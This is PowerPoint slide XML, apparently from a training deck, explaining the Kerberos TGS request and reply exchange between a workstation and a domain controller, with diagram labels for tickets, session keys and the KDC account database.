            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160768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right)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="79"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="after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wipe(right)">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2.77778E-7 -1.48148E-6 L -0.29983 -0.02754 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-15000" y="-1389"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="24" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="25" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>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55"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="55"/>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="34" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="36"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3. TGS Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="1923604"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The TGS request includes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Name and domain name of the target computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user‘s TGT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An authenticator encrypted with the session key the user shares with the KDC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5771714" y="3212407"/>
            <a:ext cx="3209859" cy="2797046"/>
            <a:chOff x="5771714" y="3212407"/>
            <a:chExt cx="3209859" cy="2797046"/>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78" y="3394690"/>
              <a:ext cx="2973722" cy="2593105"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6671087" y="3494731"/>
              <a:ext cx="1442703" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Domain Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6589790" y="3753727"/>
              <a:ext cx="1612173" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>KDC Account Database</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3374" y="4099924"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6763295" y="4160207"/>
              <a:ext cx="1806580"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Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>System Key</a:t>
              </a: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1714" y="3212407"/>
              <a:ext cx="628030" cy="741586"/>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9698" y="5247578"/>
              <a:ext cx="761875" cy="761875"/>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8170" y="4609048"/>
              <a:ext cx="351842" cy="351842"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Content Placeholder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95855" y="5119794"/>
              <a:ext cx="338649" cy="338649"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="195776" y="3065461"/>
            <a:ext cx="2751911" cy="3099843"/>
            <a:chOff x="195776" y="3065461"/>
            <a:chExt cx="2751911" cy="3099843"/>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7003" y="3212407"/>
              <a:ext cx="2700684" cy="2952897"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312812" y="3296511"/>
              <a:ext cx="2567940" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Workstation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="TextBox 18"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312813" y="3539877"/>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866" y="3813752"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="3838689"/>
              <a:ext cx="1789823"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Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Ticket-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>Granting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> Service Session Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="Content Placeholder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4316" y="5613619"/>
              <a:ext cx="338649" cy="338649"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="5651819"/>
              <a:ext cx="1715503" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>System Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="323229" y="5373216"/>
              <a:ext cx="2567940" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Workstation Credential Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Picture 2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5776" y="3065461"/>
              <a:ext cx="566691" cy="526075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Picture 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939" y="4254546"/>
              <a:ext cx="472016" cy="312696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="Picture 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8493" y="4680323"/>
              <a:ext cx="348452" cy="348452"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3111530" y="3857261"/>
            <a:ext cx="2500581" cy="1390318"/>
            <a:chOff x="3111530" y="3857261"/>
            <a:chExt cx="2500581" cy="1390318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="Group 28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3111530" y="3857261"/>
              <a:ext cx="2500581" cy="1390318"/>
              <a:chOff x="3111530" y="3857261"/>
              <a:chExt cx="2500581" cy="1390318"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Rectangle 30"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3111530" y="3857261"/>
                <a:ext cx="2500581" cy="139031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spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="TextBox 31"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3692408" y="4047198"/>
                <a:ext cx="1671680" cy="838691"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Ticket-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                  <a:t>Granting</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t> Ticket</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Authenticator</a:t>
                </a:r>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="33" name="Picture 3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83621" y="3977609"/>
                <a:ext cx="472016" cy="312696"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="Picture 2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239077" y="4461936"/>
              <a:ext cx="351058" cy="573771"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Right Arrow 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3109495" y="3632210"/>
            <a:ext cx="2502616"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3. KRB_TGS_REQ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>HOST/Workstation</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="12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4574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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="50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5E-6 3.33333E-6 L -0.00104 -0.08542 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-52" y="-42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4. TGS Reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="1246495"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The reply contains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A client / server session key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TGS encrypted with the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>computers secret key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Domain Controller"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5771714" y="3212407"/>
            <a:ext cx="3209859" cy="2797046"/>
            <a:chOff x="5771714" y="3212407"/>
            <a:chExt cx="3209859" cy="2797046"/>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78" y="3394690"/>
              <a:ext cx="2973722" cy="2593105"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6671087" y="3494731"/>
              <a:ext cx="1442703" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Domain Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6589790" y="3753727"/>
              <a:ext cx="1612173" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>KDC Account Database</a:t>
              </a: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3374" y="4099924"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6763295" y="4160207"/>
              <a:ext cx="1806580" cy="1246495"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>User Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Ticket-Granting Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>System Key</a:t>
              </a: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1714" y="3212407"/>
              <a:ext cx="628030" cy="741586"/>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9698" y="5247578"/>
              <a:ext cx="761875" cy="761875"/>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8170" y="4609048"/>
              <a:ext cx="351842" cy="351842"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Content Placeholder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95855" y="5119794"/>
              <a:ext cx="338649" cy="338649"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Workstation Small"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="195776" y="2489397"/>
            <a:ext cx="2751911" cy="3099843"/>
            <a:chOff x="195776" y="3065461"/>
            <a:chExt cx="2751911" cy="3099843"/>
          </a:xfrm>
        </p:grpSpPr>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7003" y="3212407"/>
              <a:ext cx="2700684" cy="2952897"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312812" y="3296511"/>
              <a:ext cx="2567940" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Workstation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312813" y="3539877"/>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866" y="3813752"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="3838689"/>
              <a:ext cx="1789823" cy="1246495"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>User Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Ticket-Granting Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Ticket-Granting Service Session Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Content Placeholder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4316" y="5613619"/>
              <a:ext cx="338649" cy="338649"/>
            </a:xfrm>
